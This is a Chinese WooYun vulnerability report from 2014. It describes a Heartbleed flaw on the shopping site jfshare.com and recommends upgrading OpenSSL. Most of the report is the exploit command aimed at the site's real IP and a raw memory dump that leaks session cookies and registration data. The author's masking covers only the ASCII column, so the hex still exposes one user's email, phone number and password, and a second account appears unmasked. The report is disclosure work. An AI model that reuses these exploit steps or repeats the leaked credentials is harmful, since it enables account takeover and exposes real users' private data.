当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059178

漏洞标题:聚分享运维不当导致敏感信息泄露

相关厂商:聚分享

漏洞作者: 路人甲

提交时间:2014-05-02 17:50

修复时间:2014-06-16 17:50

公开时间:2014-06-16 17:50

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

闲来无事找找漏洞。。顺带发现了这个网站在刷商品好评,看来这些评价真的不能信了。

详细说明:

网站没有及时更新openssl,遭受heartbleed漏洞的影响,导致可以获取用户账号密码邮箱等重要信息。

漏洞证明:

python ssltest.py 117.121.21.69 这是www.jfshare.com的IP
结果,为保护隐私,我用#号改了别人的账号密码:
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 2527
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 33 36 0D 0A ....#.......36..
00e0: 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A Accept-Encoding:
00f0: 20 67 7A 69 70 2C 64 65 66 6C 61 74 65 2C 73 64 gzip,deflate,sd
0100: 63 68 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 ch..Accept-Langu
0110: 61 67 65 3A 20 65 6E 2D 55 53 2C 65 6E 3B 71 3D age: en-US,en;q=
0120: 30 2E 38 2C 7A 68 2D 43 4E 3B 71 3D 30 2E 36 2C 0.8,zh-CN;q=0.6,
0130: 7A 68 3B 71 3D 30 2E 34 0D 0A 43 6F 6F 6B 69 65 zh;q=0.4..Cookie
0140: 3A 20 4A 53 45 53 53 49 4F 4E 49 44 3D 37 39 31 : JSESSIONID=791
0150: 34 32 46 36 41 39 38 37 44 38 41 30 30 32 42 30 42F6A987D8A002B0
0160: 31 33 33 42 41 37 30 31 37 41 31 38 37 0D 0A 0D 133BA7017A187...
0170: 0A 5A 27 BB FE 48 68 29 43 A9 AF C4 14 82 BD A1 .Z'..Hh)C.......
0180: D1 3E 1C AA 9C 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A .>..............
0190: 30 2E 38 2C 7A 68 2D 43 4E 3B 71 3D 30 2E 36 2C 0.8,zh-CN;q=0.6,
01a0: 7A 68 3B 71 3D 30 2E 34 0D 0A 43 6F 6F 6B 69 65 zh;q=0.4..Cookie
01b0: 3A 20 4A 53 45 53 53 49 4F 4E 49 44 3D 37 39 31 : JSESSIONID=791
01c0: 34 32 46 36 41 39 38 37 44 38 41 30 30 32 42 30 42F6A987D8A002B0
01d0: 31 33 33 42 41 37 30 31 37 41 31 38 37 0D 0A 0D 133BA7017A187...
01e0: 0A 19 5D B5 22 08 04 FF 2F 64 83 3F AC 41 7A 95 ..].".../d.?.Az.
01f0: F8 03 EA FD 6A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A ....j...........
0200: 2C 20 69 73 6F 2D 38 38 35 39 2D 31 2C 20 75 74 , iso-8859-1, ut
0210: 66 2D 31 36 2C 20 67 62 32 33 31 32 2C 20 67 62 f-16, gb2312, gb
0220: 6B 2C 20 2A 3B 71 3D 30 2E 37 0D 0A 41 63 63 65 k, *;q=0.7..Acce
0230: 70 74 3A 20 2A 2F 2A 0D 0A 43 6F 6F 6B 69 65 3A pt: */*..Cookie:
0240: 20 69 73 69 64 3D 38 31 31 36 62 66 64 62 34 34 isid=8116bfdb44
0250: 66 64 64 34 37 61 65 32 33 35 30 38 38 34 31 35 fdd47ae235088415
0260: 61 34 66 30 38 38 34 38 31 35 38 33 37 34 3B 20 a4f08848158374;
0270: 4A 53 45 53 53 49 4F 4E 49 44 3D 34 46 44 32 41 JSESSIONID=4FD2A
0280: 41 46 30 39 41 42 46 44 45 36 43 31 31 41 44 33 AF09ABFDE6C11AD3
0290: 31 41 32 44 38 39 37 34 38 31 35 3B 20 43 4E 5A 1A2D8974815; CNZ
02a0: 5A 44 41 54 41 31 30 30 30 32 30 37 38 34 31 3D ZDATA1000207841=
02b0: 31 32 31 35 38 33 34 38 32 35 2D 31 33 39 38 39 1215834825-13989
02c0: 37 30 37 36 30 2D 68 74 74 70 25 32 35 33 41 25 70760-http%253A%
02d0: 32 35 32 46 25 32 35 32 46 77 77 77 2E 6A 66 73 252F%252Fwww.jfs
02e0: 68 61 72 65 2E 63 6F 6D 25 32 35 32 46 25 37 43 hare.com%252F%7C
02f0: 31 33 39 38 39 37 31 31 39 33 0D 0A 0D 0A A4 79 1398971193.....y
0300: 33 36 1E D8 65 31 3B 14 E3 0A 66 60 31 D9 FA 8B 36..e1;...f`1...
0310: 26 EF 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D &...............
0320: 45 34 31 31 35 38 43 42 45 37 43 34 34 0D 0A 0D E41158CBE7C44...
0330: 0A 75 73 65 72 49 64 3D 26 6C 6F 67 69 6E 69 64 .userId=&loginid
0340: 3D 68 73 38 35 31 31 36 33 34 37 26 65 6D 61 69 =hs8511###&emai
0350: 6C 3D 38 35 39 37 39 34 38 31 32 25 34 30 71 71 l=859794812%40qq
0360: 2E 63 6F 6D 26 6D 6F 62 69 6C 65 50 68 6F 6E 65 .com&mobilePhone
0370: 3D 31 33 37 32 36 36 39 36 30 33 34 26 70 61 73 =137266####&pas
0380: 73 77 6F 72 64 31 3D 61 62 63 64 32 32 36 34 38 sword1=####648
0390: 30 26 70 61 73 73 77 6F 72 64 32 3D 61 62 63 64 0&password2=###
03a0: 32 32 36 34 38 30 26 70 61 72 65 6E 74 49 64 3D 226480&parentId=
03b0: 25 45 35 25 39 34 25 39 30 25 45 35 25 42 30 25 %E5%94%90%E5%B0%
03c0: 38 46 25 45 35 25 41 37 25 39 30 26 76 61 6C 69 8F%E5%A7%90&vali
03d0: 64 61 74 65 43 6F 64 65 3D 33 35 35 33 26 70 72 dateCode=3553&pr
03e0: 69 76 61 63 79 3D 6F 6E 26 72 65 64 69 72 65 63 ivacy=on&redirec
03f0: 74 55 52 4C 3D E5 88 4A 75 81 15 0F 4A F8 9A 61 tURL=..Ju...J..a
0400: 51 66 BD 8C 40 E4 92 79 31 06 06 06 06 06 06 06 [email protected].......
0410: 32 39 30 30 34 33 2D 2D 70 5F 37 30 30 30 38 2D 290043--p_70008-
0420: 2D 70 5F 36 30 33 32 34 2D 2D 70 5F 34 35 30 36 -p_60324--p_4506
0430: 35 31 2D 2D 70 5F 33 32 30 30 34 31 2D 2D 70 5F 51--p_320041--p_
0440: 34 34 30 30 38 38 2D 2D 70 5F 33 36 30 30 34 30 440088--p_360040
0450: 2D 2D 70 5F 34 35 30 33 35 33 3B 20 48 6D 5F 6C --p_450353; Hm_l
0460: 76 74 5F 63 31 37 35 64 37 65 36 39 36 32 37 30 vt_c175d7e696270
0470: 66 32 65 37 62 32 64 62 64 30 37 62 38 32 30 62 f2e7b2dbd07b820b
0480: 35 35 36 3D 31 33 39 37 34 36 30 35 30 33 2C 31 556=1397460503,1
0490: 33 39 37 35 34 37 32 36 36 3B 20 48 6D 5F 6C 76 397547266; Hm_lv
04a0: 74 5F 61 35 35 31 36 37 61 32 33 37 37 65 35 65 t_a55167a2377e5e
04b0: 35 30 39 63 34 66 66 65 66 38 37 64 32 62 33 39 509c4ffef87d2b39
04c0: 38 30 3D 31 33 39 37 34 36 30 35 30 33 2C 31 33 80=1397460503,13
04d0: 39 37 35 34 37 32 36 36 3B 20 70 67 76 5F 70 76 97547266; pgv_pv
04e0: 69 3D 32 38 33 35 35 36 32 34 39 36 3B 20 5F 5F i=2835562496; __
04f0: 75 74 6D 61 3D 32 31 39 32 31 32 30 39 38 2E 38 utma=219212098.8
0500: 30 31 36 39 31 39 36 34 2E 31 33 37 30 34 32 30 01691964.1370420
0510: 30 39 35 2E 31 33 37 30 34 32 30 30 39 35 2E 31 095.1370420095.1
0520: 33 37 33 39 35 37 39 30 31 2E 32 3B 20 48 6D 5F 373957901.2; Hm_
0530: 6C 76 74 5F 65 30 33 38 65 34 39 33 63 61 30 33 lvt_e038e493ca03
0540: 62 36 35 31 32 38 35 35 36 32 32 38 66 31 32 62 b65128556228f12b
0550: 63 30 30 39 3D 31 33 37 38 34 33 32 34 31 33 2C c009=1378432413,
0560: 31 33 37 38 37 30 35 31 30 38 2C 31 33 37 38 37 1378705108,13787
0570: 37 36 37 32 32 2C 31 33 37 39 30 36 34 38 37 37 76722,1379064877
0580: 3B 20 43 4E 5A 5A 44 41 54 41 31 30 30 30 32 30 ; CNZZDATA100020
0590: 37 38 34 31 3D 34 32 38 30 33 36 34 36 34 2D 31 7841=428036464-1
05a0: 33 38 37 31 37 32 31 37 36 2D 68 74 74 70 25 32 387172176-http%2
05b0: 35 33 41 25 32 35 32 46 25 32 35 32 46 77 77 77 53A%252F%252Fwww
05c0: 2E 6A 66 73 68 61 72 65 2E 63 6F 6D 25 37 43 31 .jfshare.com%7C1
05d0: 33 39 37 37 39 31 38 35 31 3B 20 4A 53 45 53 53 397791851; JSESS
05e0: 49 4F 4E 49 44 3D 44 36 38 45 35 42 44 41 42 36 IONID=D68E5BDAB6
05f0: 46 44 30 38 38 37 37 33 31 43 37 44 36 45 38 35 FD0887731C7D6E85
0600: 32 43 46 46 39 46 3B 20 69 73 69 64 3D 34 64 63 2CFF9F; isid=4dc
0610: 34 34 33 65 34 34 38 35 37 33 34 32 38 33 37 31 443e448573428371
0620: 36 35 36 32 37 30 38 61 33 35 35 62 38 34 37 36 6562708a355b8476
0630: 32 37 33 30 39 0D 0A 43 6F 6E 6E 65 63 74 69 6F 27309..Connectio
0640: 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A 0D n: keep-alive...
0650: 0A EF 00 F5 49 88 2C B3 74 F3 E7 41 40 FB DF 89 ....I.,.t..A@...
0660: 00 28 3E 70 84 0A 75 73 65 72 49 64 3D 26 6C 6F .(>p..userId=&lo
0670: 67 69 6E 69 64 3D 6D 65 69 6D 65 69 34 31 35 26 ginid=meimei415&
0680: 65 6D 61 69 6C 3D 33 35 38 39 36 33 32 35 36 39 email=3589632569
0690: 25 34 30 71 71 2E 63 6F 6D 26 6D 6F 62 69 6C 65 %40qq.com&mobile
06a0: 50 68 6F 6E 65 3D 26 70 61 73 73 77 6F 72 64 31 Phone=&password1
06b0: 3D 31 32 33 34 35 36 26 70 61 73 73 77 6F 72 64 =123456&password
06c0: 32 3D 31 32 33 34 35 36 26 70 61 72 65 6E 74 49 2=123456&parentI
06d0: 64 3D 26 76 61 6C 69 64 61 74 65 43 6F 64 65 3D d=&validateCode=
06e0: 31 34 37 31 26 70 72 69 76 61 63 79 3D 6F 6E 26 1471&privacy=on&
06f0: 72 65 64 69 72 65 63 74 55 52 4C 3D 6B B0 F9 7F redirectURL=k...
0700: B0 CD 18 E5 F2 76 D2 59 81 B4 75 D2 00 00 00 00 .....v.Y..u.....

修复方案:

建议更新openssl到最新版本。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝